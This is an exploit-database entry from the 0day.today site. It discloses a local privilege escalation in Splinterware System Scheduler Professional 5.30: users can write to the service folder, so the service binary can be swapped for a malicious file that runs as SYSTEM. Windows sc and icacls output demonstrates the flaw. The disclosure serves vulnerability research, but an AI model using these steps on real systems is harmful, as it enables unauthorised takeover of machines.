0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Splinterware System Scheduler Professional 5.30 - Unquoted Service Path Vulnerability
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Splinterware System Scheduler Professional 5.30 - Unquoted Service Path
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.splinterware.com
# Software Link: https://www.splinterware.com/download/ssproeval.exe
# Version: 5.30 Professional
# Tested on: Windows 10 Pro 20H2 x64
System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting
where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with
elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System;
renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one
will be executed after a short while.
C:\Users\test>sc qc WindowsScheduler
[SC] QueryServiceConfig OPERAZIONI RIUSCITE
NOME_SERVIZIO: WindowsScheduler
TIPO : 10 WIN32_OWN_PROCESS
TIPO_AVVIO : 2 AUTO_START
CONTROLLO_ERRORE : 0 IGNORE
NOME_PERCORSO_BINARIO : C:\PROGRA~2\SYSTEM~1\WService.exe
GRUPPO_ORDINE_CARICAMENTO :
TAG : 0
NOME_VISUALIZZATO : System Scheduler Service
DIPENDENZE :
SERVICE_START_NAME : LocalSystem
C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\
C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
NT SERVICE\TrustedInstaller:(I)(F)
NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
BUILTIN\Users:(I)(RX)
BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
C:\Users\test>
# 0day.today [2024-09-28] #